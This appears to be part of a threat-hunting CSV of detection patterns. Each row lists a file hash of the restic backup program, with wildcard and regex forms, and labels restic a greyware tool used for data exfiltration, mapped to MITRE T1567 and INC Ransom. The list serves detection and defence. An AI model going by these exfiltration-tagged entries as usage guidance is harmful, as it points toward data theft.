"*df0a51bf7623a3d0c67f707feb0a086fd15d08a6e0413392fca280e540854fce*",".{0,1000}df0a51bf7623a3d0c67f707feb0a086fd15d08a6e0413392fca280e540854fce.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*df278eebd151b6ff62ceae968e3a4203a58d447712ec3fdb62551b25299a61e1*",".{0,1000}df278eebd151b6ff62ceae968e3a4203a58d447712ec3fdb62551b25299a61e1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*dfd2a510010aa652da30a1d05de760782d9e7dc8598ff9f1f3d4da2d734269cf*",".{0,1000}dfd2a510010aa652da30a1d05de760782d9e7dc8598ff9f1f3d4da2d734269cf.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e028c07ede569edf05373d2f271fa4ae6f4c0ecfed56c1c22d46b1b3c85a34df*",".{0,1000}e028c07ede569edf05373d2f271fa4ae6f4c0ecfed56c1c22d46b1b3c85a34df.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e0dca6ebd175563726b1a7f83614b53194a8945421241b3b2fba18784bc4db7a*",".{0,1000}e0dca6ebd175563726b1a7f83614b53194a8945421241b3b2fba18784bc4db7a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e1167085d98313b940710377908862a133a471e476163d929b16fe74efee5356*",".{0,1000}e1167085d98313b940710377908862a133a471e476163d929b16fe74efee5356.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e11bbacc2254a1aaf69807117f5dd21bba924ff5dba6bff978a401bfee10640c*",".{0,1000}e11bbacc2254a1aaf69807117f5dd21bba924ff5dba6bff978a401bfee10640c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e124760dda781a328d0ca851b38a124eff12f1814fa4b70458565c69b546559d*",".{0,1000}e124760dda781a328d0ca851b38a124eff12f1814fa4b70458565c69b546559d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e1aad78efc4a500f13014eacfd687f10060d703e896efd1c60930e3167e4d2ff*",".{0,1000}e1aad78efc4a500f13014eacfd687f10060d703e896efd1c60930e3167e4d2ff.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e1d81195194f684a0df34da1b4ff305d1c033283521c02f36a6f5cdeffcd6f2d*",".{0,1000}e1d81195194f684a0df34da1b4ff305d1c033283521c02f36a6f5cdeffcd6f2d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e22208e946ede07f56ef60c1c89de817b453967663ce4867628dff77761bd429*",".{0,1000}e22208e946ede07f56ef60c1c89de817b453967663ce4867628dff77761bd429.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e245d857b943531a9617677179564e03675f992c6e4b6876090279b1fa8f3e7c*",".{0,1000}e245d857b943531a9617677179564e03675f992c6e4b6876090279b1fa8f3e7c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e27f8c61205a5fa71ce1d1dc4f3a79f10d58ec2fd7f05b07c26a4742beaf4edc*",".{0,1000}e27f8c61205a5fa71ce1d1dc4f3a79f10d58ec2fd7f05b07c26a4742beaf4edc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e35620841c35cc70619f963842c207107b9c52217e4c807c72178181ad5e3695*",".{0,1000}e35620841c35cc70619f963842c207107b9c52217e4c807c72178181ad5e3695.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e369b92cecfa897281c727a565a81ce86ab629088bde9d95d690ad86284713ef*",".{0,1000}e369b92cecfa897281c727a565a81ce86ab629088bde9d95d690ad86284713ef.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e373f4331ba91d4862d2b9f8646c9e18e20b93445cbe203ed86336cbfccab6d8*",".{0,1000}e373f4331ba91d4862d2b9f8646c9e18e20b93445cbe203ed86336cbfccab6d8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e41dc72ece30584c3e9c7772ba01a9f17e4e348805521382d16299e4694ac467*",".{0,1000}e41dc72ece30584c3e9c7772ba01a9f17e4e348805521382d16299e4694ac467.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e4a6b203697794386d11faebc4da7ffe7c03262755b4ac64e0c4ae633eccdc0b*",".{0,1000}e4a6b203697794386d11faebc4da7ffe7c03262755b4ac64e0c4ae633eccdc0b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e4e4ef54d935c9de34f40e748702f5cbec400bd36b5977a22fcf1040d6945046*",".{0,1000}e4e4ef54d935c9de34f40e748702f5cbec400bd36b5977a22fcf1040d6945046.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e60e06956a8e8cdcba7688b6cb9b9815ada2b025e87b94d717172c02b9aa6c91*",".{0,1000}e60e06956a8e8cdcba7688b6cb9b9815ada2b025e87b94d717172c02b9aa6c91.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e6139b506d55565bb81ff034a8ec03349ee6f0938c27cbe846f22853e8770b7a*",".{0,1000}e6139b506d55565bb81ff034a8ec03349ee6f0938c27cbe846f22853e8770b7a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e63b787de388b158b538006003db536fa48dec43ad26080afe44d42d93ee2115*",".{0,1000}e63b787de388b158b538006003db536fa48dec43ad26080afe44d42d93ee2115.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e7ae22a62f42e92811bb79ed2a268d4794a640a1d61282985f5dfd1b1d583b60*",".{0,1000}e7ae22a62f42e92811bb79ed2a268d4794a640a1d61282985f5dfd1b1d583b60.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e7c7c93448d7780b741496d34b10423f266ba09a8ebf1093b6d186e1f4c9e60a*",".{0,1000}e7c7c93448d7780b741496d34b10423f266ba09a8ebf1093b6d186e1f4c9e60a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e82bcb39e340b7dccdfbf649ffcbef1f7ca0d90e0d217e29bb67a95dc1cdab24*",".{0,1000}e82bcb39e340b7dccdfbf649ffcbef1f7ca0d90e0d217e29bb67a95dc1cdab24.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e8c7827dae5c757ddfdd23ef8c97c24315a9c06dcecdde7ceb45dd21145d7a2a*",".{0,1000}e8c7827dae5c757ddfdd23ef8c97c24315a9c06dcecdde7ceb45dd21145d7a2a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e8ea6411a9baa77588224ebbe6ebf21517cfeaf9b1933eef19246f955beaab4c*",".{0,1000}e8ea6411a9baa77588224ebbe6ebf21517cfeaf9b1933eef19246f955beaab4c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*e94efe0f4337a2d8d91bf3933d6bd71fc6671fe5045d65d977448b3f2c7747ec*",".{0,1000}e94efe0f4337a2d8d91bf3933d6bd71fc6671fe5045d65d977448b3f2c7747ec.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*eaaad7b12438c24759b68cd6b0652598125e8a34d1d83c581191418822b6f851*",".{0,1000}eaaad7b12438c24759b68cd6b0652598125e8a34d1d83c581191418822b6f851.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*eb8b75bf891ae654791aba1d7ac98f4f528d1f44cdf3f63604a4de92b309e5a1*",".{0,1000}eb8b75bf891ae654791aba1d7ac98f4f528d1f44cdf3f63604a4de92b309e5a1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ec2e688f44920bed00a0bb87ec28be0d40dc7ebdfd20efdd4734afcc7b132207*",".{0,1000}ec2e688f44920bed00a0bb87ec28be0d40dc7ebdfd20efdd4734afcc7b132207.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ec5dcf71ec36103aaae9227bfc4090d5ce3c9e07a184a2150674c7b70f0d63d6*",".{0,1000}ec5dcf71ec36103aaae9227bfc4090d5ce3c9e07a184a2150674c7b70f0d63d6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ec72c50bdd6b49a4a045ee92e471c01596640426aa4f5cdfdce2c2a975a2913d*",".{0,1000}ec72c50bdd6b49a4a045ee92e471c01596640426aa4f5cdfdce2c2a975a2913d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ece898dc29881a952b5e8cbaccc17dc1fa546d61910be9cb8be05049af64ed78*",".{0,1000}ece898dc29881a952b5e8cbaccc17dc1fa546d61910be9cb8be05049af64ed78.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ecf5f36c4567104dff7f7fc83958a2d03fce1920ab7cd37fc109d10db75620c5*",".{0,1000}ecf5f36c4567104dff7f7fc83958a2d03fce1920ab7cd37fc109d10db75620c5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ee3caa7a4881716651aa159df73e817c7a7d3fcf82a234d83d3f78d4070975e9*",".{0,1000}ee3caa7a4881716651aa159df73e817c7a7d3fcf82a234d83d3f78d4070975e9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*ef7bd67653ef87e73212d92560a12c430fda7f73b86d9eb9865123c44f2dfbfe*",".{0,1000}ef7bd67653ef87e73212d92560a12c430fda7f73b86d9eb9865123c44f2dfbfe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*efa3e8453d29c9a5c581f0ff42a6aab237ccda2ba1b545d013ba1a2adaa4348e*",".{0,1000}efa3e8453d29c9a5c581f0ff42a6aab237ccda2ba1b545d013ba1a2adaa4348e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*efdd75eb5c12af6fec4189aa57dc777035a87dd57204daa52293901199569157*",".{0,1000}efdd75eb5c12af6fec4189aa57dc777035a87dd57204daa52293901199569157.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*efed00b9707b548838bb7010f9d42b41d8e2e4eedc6a2c3c3487f4e96d7439a1*",".{0,1000}efed00b9707b548838bb7010f9d42b41d8e2e4eedc6a2c3c3487f4e96d7439a1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f0078e7c09aa38b301ec1b1679ec97bc711a178da3ca48c9354c08b33933165c*",".{0,1000}f0078e7c09aa38b301ec1b1679ec97bc711a178da3ca48c9354c08b33933165c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f0474b15500edb41cb2eb6c7091bf96c0fe3ec455b8c0559974fcf1a3b1668e2*",".{0,1000}f0474b15500edb41cb2eb6c7091bf96c0fe3ec455b8c0559974fcf1a3b1668e2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f05d3115ca5636a3a30f454f62c51746473121d40b9624dd28d84589b8e2eaf2*",".{0,1000}f05d3115ca5636a3a30f454f62c51746473121d40b9624dd28d84589b8e2eaf2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f1a9c39d396d1217c05584284352f4a3bef008be5d06ce1b81a6cf88f6f3a7b1*",".{0,1000}f1a9c39d396d1217c05584284352f4a3bef008be5d06ce1b81a6cf88f6f3a7b1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f1fd018de5da0ba61e095a731ec6e142c9cde50f6231eabb475a889fe5f323d4*",".{0,1000}f1fd018de5da0ba61e095a731ec6e142c9cde50f6231eabb475a889fe5f323d4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f1ff71f1b4751329a9957412758931f8b13a9477dcff3435ee3b9ba98a6ace73*",".{0,1000}f1ff71f1b4751329a9957412758931f8b13a9477dcff3435ee3b9ba98a6ace73.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f27c3b271ad36896e22e411dea4c1c14d5ec75a232538c62099771ab7472765a*",".{0,1000}f27c3b271ad36896e22e411dea4c1c14d5ec75a232538c62099771ab7472765a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f2b2bb7385ee56d98659c4a0dbf42eca46227e10f92183a92934f4d96d523501*",".{0,1000}f2b2bb7385ee56d98659c4a0dbf42eca46227e10f92183a92934f4d96d523501.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f3c09c7cc731000a762f816214dcbe8936eb470992d8c04c1439d436c09f26ac*",".{0,1000}f3c09c7cc731000a762f816214dcbe8936eb470992d8c04c1439d436c09f26ac.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f406a3f05847268c14ec391457680b2fc6372d5e506c153de5dabe8268751480*",".{0,1000}f406a3f05847268c14ec391457680b2fc6372d5e506c153de5dabe8268751480.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f430a8069d7fac26e93994f8d89419e5285acbc0fb4514c89f427a070614af2e*",".{0,1000}f430a8069d7fac26e93994f8d89419e5285acbc0fb4514c89f427a070614af2e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f467c57b696a4f23fb1655091ee0af941318960d53fb94bacc4e9162585f4a0e*",".{0,1000}f467c57b696a4f23fb1655091ee0af941318960d53fb94bacc4e9162585f4a0e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f522b356e994e001db129e2dc3f813d23b09327c623a567593cbe9dd4e130ac1*",".{0,1000}f522b356e994e001db129e2dc3f813d23b09327c623a567593cbe9dd4e130ac1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f559e774c91f1201ffddba74d5758dec8342ad2b50a3bcd735ccb0c88839045c*",".{0,1000}f559e774c91f1201ffddba74d5758dec8342ad2b50a3bcd735ccb0c88839045c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f66e099b3dfc1bfa8fbbcbc04eaae20961e1b27fbb3994305d3dc7251a88da69*",".{0,1000}f66e099b3dfc1bfa8fbbcbc04eaae20961e1b27fbb3994305d3dc7251a88da69.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f6c0fbaa3c9181db206d10a474c7c977ce274cf8ff7f7b170e5651a00d283c68*",".{0,1000}f6c0fbaa3c9181db206d10a474c7c977ce274cf8ff7f7b170e5651a00d283c68.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f6e25c33ec23c5d6864468e4839076fa3f6613f67763f054df545a2fbf58828e*",".{0,1000}f6e25c33ec23c5d6864468e4839076fa3f6613f67763f054df545a2fbf58828e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f7f76812fa26ca390029216d1378e5504f18ba5dde790878dfaa84afef29bda7*",".{0,1000}f7f76812fa26ca390029216d1378e5504f18ba5dde790878dfaa84afef29bda7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f800aa3832f7f6026d8bcb866ffd08a791ff0fee061520a9759549a0ea63d0e0*",".{0,1000}f800aa3832f7f6026d8bcb866ffd08a791ff0fee061520a9759549a0ea63d0e0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f818778b135d3b0ca9710992e13b7e06458fcde3aa914b60907aeca7ac84bb5e*",".{0,1000}f818778b135d3b0ca9710992e13b7e06458fcde3aa914b60907aeca7ac84bb5e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f8f06d08c202c37b3d6ba70e0ad208e64d8673fbf6031e850dfc6d673cce6e44*",".{0,1000}f8f06d08c202c37b3d6ba70e0ad208e64d8673fbf6031e850dfc6d673cce6e44.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*f9ad4d91c181da2968ccdecb5238bf872f824fe1e40253f3347c4025192f19c9*",".{0,1000}f9ad4d91c181da2968ccdecb5238bf872f824fe1e40253f3347c4025192f19c9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*fa038acf7cd53cad4e1e6aef7d73a7a2c4eafff9fd344db05ff725884166e58c*",".{0,1000}fa038acf7cd53cad4e1e6aef7d73a7a2c4eafff9fd344db05ff725884166e58c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*faa846645677d0e4da5812851326f4f18b7310d53edd380ed93165099395e4c7*",".{0,1000}faa846645677d0e4da5812851326f4f18b7310d53edd380ed93165099395e4c7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
